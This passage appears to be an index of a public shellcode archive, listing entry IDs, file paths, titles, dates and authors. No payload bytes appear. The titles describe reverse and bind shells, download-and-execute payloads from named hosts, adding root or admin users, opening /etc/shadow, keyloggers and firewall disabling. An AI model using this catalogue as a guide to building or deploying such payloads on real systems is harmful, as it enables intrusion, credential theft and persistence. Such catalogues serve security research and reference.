412 15315 shellcodes/arm/15315.asm Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
413 15316 shellcodes/arm/15316.asm Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
414 15317 shellcodes/arm/15317.asm Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
415 15616 shellcodes/arm/15616.c Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes) 2010-11-25 Jonathan Salwan shellcode arm
416 15618 shellcodes/osx/15618.c OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes) 2010-11-25 Dustin Schultz shellcode osx
417 15712 shellcodes/generator/15712.rb ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator) 2010-12-09 Jonathan Salwan shellcode generator
418 15879 shellcodes/windows_x86/15879.txt Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode 2010-12-31 Skylined shellcode windows_x86
419 16025 shellcodes/generator/16025.c FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator) 2011-01-21 Tosh shellcode generator
420 16026 shellcodes/freebsd_x86/16026.c FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes) 2011-01-21 Tosh shellcode freebsd_x86
421 16283 shellcodes/windows_x86/16283.txt Windows x86 - Eggsearch Shellcode (33 bytes) Windows/x86 - Eggsearch Shellcode (33 bytes) 2011-03-05 oxff shellcode windows_x86
422 17432 shellcodes/superh_sh4/17432.c Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) 2011-06-22 Jonathan Salwan shellcode superh_sh4
423 17194 shellcodes/linux_x86/17194.txt Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes) 2011-04-21 Jonathan Salwan shellcode linux_x86
424 17224 shellcodes/osx/17224.s OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) 2011-04-29 hammackj shellcode osx
425 17323 shellcodes/windows/17323.c Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes) 2011-05-25 RubberDuck shellcode windows
426 20195 shellcodes/linux_x86/20195.c Linux/x86 - Disable ASLR Security Shellcode (83 bytes) 2012-08-02 Jean Pascal Pereira shellcode linux_x86
427 17326 shellcodes/generator/17326.rb Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit) Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit) 2011-05-26 Alexey Sintsov shellcode generator
428 17371 shellcodes/linux_x86/17371.c Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes) 2011-06-08 Jonathan Salwan shellcode linux_x86
429 17439 shellcodes/superh_sh4/17439.c Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes) 2011-06-23 Jonathan Salwan shellcode superh_sh4
430 17545 shellcodes/windows_x86/17545.txt Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes) Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes) 2011-07-18 KaHPeSeSe shellcode windows_x86
431 17559 shellcodes/linux_x86/17559.c Linux/x86 - Egghunter Null-Free Shellcode (29 bytes) Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes) 2011-07-21 Ali Raheem shellcode linux_x86
432 17564 shellcodes/osx/17564.asm OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode 2011-07-24 pa_kt shellcode osx
433 17940 shellcodes/linux_mips/17940.c Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes) 2011-10-07 entropy shellcode linux_mips
434 17996 shellcodes/generator/17996.c Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator) 2011-10-18 entropy shellcode generator
438 18197 shellcodes/linux_x86-64/18197.c Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes) 2011-12-03 X-h4ck shellcode linux_x86-64
439 18226 shellcodes/linux_mips/18226.c Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes) 2011-12-10 rigan shellcode linux_mips
440 18227 shellcodes/linux_mips/18227.c Linux/MIPS - reboot() Shellcode (32 bytes) 2011-12-10 rigan shellcode linux_mips
441 18294 shellcodes/linux_x86/18294.c Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode 2011-12-31 pentesters.ir shellcode linux_x86
442 18379 shellcodes/linux_x86/18379.c Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes) 2012-01-17 rigan shellcode linux_x86
443 18585 shellcodes/linux_x86-64/18585.s Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes) 2012-03-12 0_o shellcode linux_x86-64
444 18885 shellcodes/linux_x86/18885.c Linux/x86 - execve(/bin/dash) Shellcode (42 bytes) 2012-05-16 X-h4ck shellcode linux_x86
446 21252 shellcodes/arm/21252.asm Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes) 2012-09-11 midnitesnake shellcode arm
447 21253 shellcodes/arm/21253.asm Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes) 2012-09-11 midnitesnake shellcode arm
448 21254 shellcodes/arm/21254.asm Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes) 2012-09-11 midnitesnake shellcode arm
449 40363 shellcodes/windows_x86/40363.c Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes) Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes) 2016-09-13 Roziul Hasan Khan Shifat shellcode windows_x86
450 22489 shellcodes/windows/22489.cpp Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes) Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes) 2012-11-05 b33f shellcode windows
451 40890 shellcodes/windows_x86-64/40890.c Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes) Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes) 2016-12-08 Roziul Hasan Khan Shifat shellcode windows_x86-64
452 23622 shellcodes/linux_x86/23622.c Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes) 2012-12-24 Hamza Megahed shellcode linux_x86
453 24318 shellcodes/windows/24318.c Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode 2013-01-24 RubberDuck shellcode windows
454 25497 shellcodes/linux_x86/25497.c Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes) 2013-05-17 Russell Willis shellcode linux_x86
455 40387 shellcodes/hardware/40387.nasm Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes) Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes) 2016-09-16 Sean Dillon shellcode hardware
456 27132 shellcodes/linux_mips/27132.txt Linux/MIPS (Little Endian) - system() Shellcode (80 bytes) 2013-07-27 Jacob Holcomb shellcode linux_mips
457 27180 shellcodes/arm/27180.asm Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode Windows/ARM (RT) - Bind TCP (4444/TCP) Shell Shellcode 2013-07-28 Matthew Graeber shellcode arm
458 40827 shellcodes/linux_x86/40827.c Linux/x86 - Egghunter Shellcode (31 bytes) Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes) 2016-11-25 Filippo Bersani shellcode linux_x86
459 28474 shellcodes/linux_x86/28474.c Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode 2013-09-23 Ryan Fenno shellcode linux_x86
460 40334 shellcodes/windows_x86/40334.c Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes) Windows/x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes) 2016-09-05 Roziul Hasan Khan Shifat shellcode windows_x86
461 28996 shellcodes/windows/28996.c Windows - MessageBox Null-Free Shellcode (113 bytes) Windows - MessageBox + Null-Free Shellcode (113 bytes) 2013-10-16 Giuseppe D'Amore shellcode windows
462 29436 shellcodes/linux_mips/29436.asm Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes) 2013-11-04 Jacob Holcomb shellcode linux_mips
463 40352 shellcodes/windows_x86/40352.c Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes) Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes) 2016-09-08 Roziul Hasan Khan Shifat shellcode windows_x86
464 33836 shellcodes/windows/33836.txt Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes) Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes) 2014-06-22 Giuseppe D'Amore shellcode windows
465 34060 shellcodes/linux_x86/34060.c Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes) 2014-07-14 ZadYree shellcode linux_x86
466 34262 shellcodes/linux_x86/34262.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes) 2014-08-04 Ali Razmjoo shellcode linux_x86
467 34592 shellcodes/linux_x86/34592.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) 2014-09-09 Ali Razmjoo shellcode linux_x86
468 34667 shellcodes/linux_x86-64/34667.c Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes) 2014-09-15 MadMouse shellcode linux_x86-64
469 34778 shellcodes/linux_x86/34778.c Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes) 2014-09-25 Javier Tejedor shellcode linux_x86
470 35205 shellcodes/linux_x86-64/35205.txt Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes) 2014-11-10 Breaking.Technology shellcode linux_x86-64
471 35519 shellcodes/linux_x86/35519.txt Linux/x86 - rmdir Shellcode (37 bytes) Linux/x86 - rmdir() Shellcode (37 bytes) 2014-12-11 kw4 shellcode linux_x86
472 35586 shellcodes/linux_x86-64/35586.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes) 2014-12-22 Sean Dillon shellcode linux_x86-64
473 35587 shellcodes/linux_x86-64/35587.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) 2014-12-22 Sean Dillon shellcode linux_x86-64
474 35793 shellcodes/windows_x86/35793.txt Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86
475 35794 shellcodes/windows_x86-64/35794.txt Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86-64
476 35868 shellcodes/linux_mips/35868.c Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes) 2015-01-22 Sanguine shellcode linux_mips
477 36411 shellcodes/generator/36411.txt Windows XP x86-64 - Download File + Execute Shellcode (Generator) Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator) 2015-03-16 Ali Razmjoo shellcode generator
478 36274 shellcodes/linux_mips/36274.c Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes) 2015-03-05 Sang Min Lee shellcode linux_mips
479 36276 shellcodes/linux_mips/36276.c Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes) 2015-03-05 Sang Min Lee shellcode linux_mips
480 36359 shellcodes/linux_x86-64/36359.c Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes) 2014-03-27 Chris Higgins shellcode linux_x86-64
481 36391 shellcodes/linux_x86/36391.c Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
482 36393 shellcodes/linux_x86/36393.c Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes) Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
483 36394 shellcodes/linux_x86/36394.c Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
484 36395 shellcodes/linux_x86/36395.c Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes) Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
485 36397 shellcodes/linux_x86/36397.c Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
486 36398 shellcodes/linux_x86/36398.c Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
487 36637 shellcodes/linux_x86/36637.c Linux/x86 - Disable ASLR Security Shellcode (84 bytes) 2015-04-03 Mohammad Reza Ramezani shellcode linux_x86
488 36672 shellcodes/linux_x86/36672.asm Linux/x86 - Egghunter Shellcode (20 bytes) Linux/x86 - Egghunter (0x5159) Shellcode (20 bytes) 2015-04-08 Paw Petersen shellcode linux_x86
489 36673 shellcodes/generator/36673.py Linux/x86 - Typewriter Shellcode (Generator) 2015-04-08 Paw Petersen shellcode generator
490 36701 shellcodes/linux_x86/36701.c Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes) Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes) 2015-04-10 Mohammad Reza Ramezani shellcode linux_x86
491 36750 shellcodes/linux_x86/36750.c Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes) Linux/x86 - setreuid(0_ 0) + execve(/sbin/halt) + exit(0) Shellcode (49 bytes) 2015-04-14 Febriyanto Nugroho shellcode linux_x86
492 36778 shellcodes/linux_x86/36778.c Linux/x86 - execve(/bin/sh) Shellcode (35 bytes) 2015-04-17 Mohammad Reza Espargham shellcode linux_x86
493 36779 shellcodes/windows_x86/36779.c Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes) Windows/x86 (XP SP3) - Create (file.txt) Shellcode (83 bytes) 2015-04-17 TUNISIAN CYBER shellcode windows_x86
494 36780 shellcodes/windows_x86/36780.c Windows XP SP3 x86 - Restart Shellcode (57 bytes) Windows/x86 (XP SP3) - Restart Shellcode (57 bytes) 2015-04-17 TUNISIAN CYBER shellcode windows_x86
495 36781 shellcodes/generator/36781.py Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator) 2015-04-17 Konstantinos Alexiou shellcode generator
496 36857 shellcodes/linux_x86/36857.c Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes) 2015-04-29 noviceflux shellcode linux_x86
497 36858 shellcodes/linux_x86-64/36858.c Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes) 2015-04-29 noviceflux shellcode linux_x86-64
498 36921 shellcodes/linux_x86/36921.c Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes) 2015-05-06 Oleg Boytsev shellcode linux_x86
499 36908 shellcodes/linux_x86/36908.c Linux/x86 - exit(0) Shellcode (6 bytes) 2015-05-04 Febriyanto Nugroho shellcode linux_x86
504 37297 shellcodes/linux_x86/37297.txt Linux/x86 - Read /etc/passwd Shellcode (58 bytes) 2015-06-16 B3mB4m shellcode linux_x86
505 37358 shellcodes/linux_x86/37358.c Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes) 2015-06-24 B3mB4m shellcode linux_x86
506 37359 shellcodes/linux_x86/37359.c Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes) 2015-06-24 B3mB4m shellcode linux_x86
507 37362 shellcodes/linux_x86-64/37362.c Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes) Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes) 2015-06-24 Bill Borskey shellcode linux_x86-64
508 37365 shellcodes/linux_x86/37365.c Linux/x86 - Download File + Execute Shellcode 2015-06-24 B3mB4m shellcode linux_x86
509 37366 shellcodes/linux_x86/37366.c Linux/x86 - Reboot Shellcode (28 bytes) Linux/x86 - Reboot() Shellcode (28 bytes) 2015-06-24 B3mB4m shellcode linux_x86
510 37384 shellcodes/linux_x86/37384.c Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1) 2015-06-26 Bill Borskey shellcode linux_x86
511 37390 shellcodes/linux_x86/37390.asm Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
512 37391 shellcodes/linux_x86/37391.asm Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
513 37392 shellcodes/linux_x86/37392.asm Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
514 37393 shellcodes/linux_x86/37393.asm Linux/x86 - exec /bin/dash Shellcode (45 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
515 37401 shellcodes/linux_x86-64/37401.asm Linux/x86-64 - execve() Encoded Shellcode (57 bytes) 2015-06-27 Bill Borskey shellcode linux_x86-64
516 37495 shellcodes/linux_x86/37495.py Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode 2015-07-05 Artem T shellcode linux_x86
517 37664 shellcodes/windows_x86/37664.c Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes) Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes) 2015-07-21 B3mB4m shellcode windows_x86
518 37749 shellcodes/linux_x86/37749.c Linux/x86 - Egghunter Shellcode (19 bytes) Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes) 2015-08-10 Guillaume Kaddouch shellcode linux_x86
519 37758 shellcodes/windows_x86/37758.c Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes) Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes) 2015-08-12 noviceflux shellcode windows_x86
520 37762 shellcodes/linux_x86/37762.py Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode 2015-08-12 Anastasios Monachos shellcode linux_x86
521 37895 shellcodes/windows_x86-64/37895.asm Windows 2003 x64 - Token Stealing Shellcode (59 bytes) Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes) 2015-08-20 Fitzl Csaba shellcode windows_x86-64
522 38065 shellcodes/osx/38065.txt OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes) OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes) 2015-09-02 Fitzl Csaba shellcode osx
523 38075 shellcodes/system_z/38075.txt Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes) 2015-09-02 Bigendian Smalls shellcode system_z
524 38088 shellcodes/linux_x86/38088.c Linux/x86 - execve(/bin/bash) Shellcode (31 bytes) 2015-09-06 Ajith Kp shellcode linux_x86
525 38094 shellcodes/generator/38094.c Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) 2015-09-07 Ajith Kp shellcode generator
529 38194 shellcodes/android/38194.c Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes) 2015-09-15 Steven Padilla shellcode android
530 38239 shellcodes/linux_x86-64/38239.asm Linux/x86-64 - execve() Shellcode (22 bytes) 2015-09-18 d4sh&r shellcode linux_x86-64
531 38469 shellcodes/linux_x86-64/38469.c Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes) 2015-10-15 d4sh&r shellcode linux_x86-64
532 38708 shellcodes/linux_x86-64/38708.asm Linux/x86-64 - Egghunter Shellcode (24 bytes) Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes) 2015-11-16 d4sh&r shellcode linux_x86-64
533 38815 shellcodes/linux_x86-64/38815.c Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes) 2015-11-25 d4sh&r shellcode linux_x86-64
534 38959 shellcodes/generator/38959.py Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator) Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator) 2015-12-13 B3mB4m shellcode generator
535 39149 shellcodes/linux_x86-64/39149.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) 2016-01-01 Scorpion_ shellcode linux_x86-64
536 39152 shellcodes/linux_x86-64/39152.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) 2016-01-02 Sathish kumar shellcode linux_x86-64
537 39160 shellcodes/linux_x86/39160.c Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1) 2016-01-04 Dennis 'dhn' Herrmann shellcode linux_x86
538 39185 shellcodes/linux_x86-64/39185.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) 2016-01-06 Sathish kumar shellcode linux_x86-64
539 39203 shellcodes/linux_x86-64/39203.c Linux/x86-64 - Egghunter Shellcode (18 bytes) Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes) 2016-01-08 Sathish kumar shellcode linux_x86-64
540 39204 shellcodes/linux_x86/39204.c Linux/x86 - Egghunter Shellcode (13 bytes) Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes) 2016-01-08 Dennis 'dhn' Herrmann shellcode linux_x86
541 39312 shellcodes/linux_x86-64/39312.c Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes) 2016-01-25 Sathish kumar shellcode linux_x86-64
542 39336 shellcodes/linux/39336.c Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes) 2016-01-27 B3mB4m shellcode linux
543 39337 shellcodes/linux/39337.c Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes) 2016-01-27 B3mB4m shellcode linux
544 39338 shellcodes/linux/39338.c Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes) 2016-01-27 B3mB4m shellcode linux
547 39389 shellcodes/linux_x86/39389.c Linux/x86 - Download File + Execute Shellcode (135 bytes) 2016-02-01 B3mB4m shellcode linux_x86
548 39390 shellcodes/linux_x86-64/39390.c Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes) 2016-02-01 Sathish kumar shellcode linux_x86-64
549 39496 shellcodes/arm/39496.c Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes) 2016-02-26 Xeon shellcode arm
550 39519 shellcodes/windows_x86/39519.c Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) 2016-03-02 Sean Dillon shellcode windows_x86
551 39578 shellcodes/linux_x86-64/39578.c Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes) 2016-03-21 Sudhanshu Chauhan shellcode linux_x86-64
552 39617 shellcodes/linux_x86-64/39617.c Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes) 2016-03-24 Ajith Kp shellcode linux_x86-64
553 39624 shellcodes/linux_x86-64/39624.c Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1) 2016-03-28 Ajith Kp shellcode linux_x86-64
555 39684 shellcodes/linux_x86-64/39684.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes) 2016-04-11 Ajith Kp shellcode linux_x86-64
556 39700 shellcodes/linux_x86-64/39700.c Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes) 2016-04-15 Ajith Kp shellcode linux_x86-64
557 39718 shellcodes/linux_x86-64/39718.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes) 2016-04-21 Ajith Kp shellcode linux_x86-64
558 40094 shellcodes/windows_x86/40094.c Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) 2016-07-13 Roziul Hasan Khan Shifat shellcode windows_x86
559 39722 shellcodes/linux_x86/39722.c Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes) 2016-04-25 Roziul Hasan Khan Shifat shellcode linux_x86
560 39723 shellcodes/linux_x86/39723.c Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes) 2016-04-25 Roziul Hasan Khan Shifat shellcode linux_x86
561 39728 shellcodes/generator/39728.py Linux/x86-64 - Bind TCP Shell Shellcode (Generator) 2016-04-25 Ajith Kp shellcode generator
562 39731 shellcodes/windows/39731.c Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes) Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes) 2016-04-25 Fugu shellcode windows
563 39754 shellcodes/windows_x86/39754.txt Windows .Net Framework x86 - Execute Native x86 Shellcode Windows/x86 (.Net Framework) - Execute Native x86 Shellcode 2016-05-02 Jacky5112 shellcode windows_x86
564 39758 shellcodes/linux_x86-64/39758.c Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes) 2016-05-04 Roziul Hasan Khan Shifat shellcode linux_x86-64
565 39763 shellcodes/linux_x86-64/39763.c Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes) 2016-05-04 Roziul Hasan Khan Shifat shellcode linux_x86-64
566 39794 shellcodes/windows/39794.c Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes) Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes) 2016-05-10 Fugu shellcode windows
567 39815 shellcodes/generator/39815.c Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator) 2016-05-16 JollyFrogs shellcode generator
568 39847 shellcodes/linux_x86-64/39847.c Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) 2016-05-23 Roziul Hasan Khan Shifat shellcode linux_x86-64
569 39851 shellcodes/linux_x86/39851.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes) 2016-05-25 Brandon Dennis shellcode linux_x86
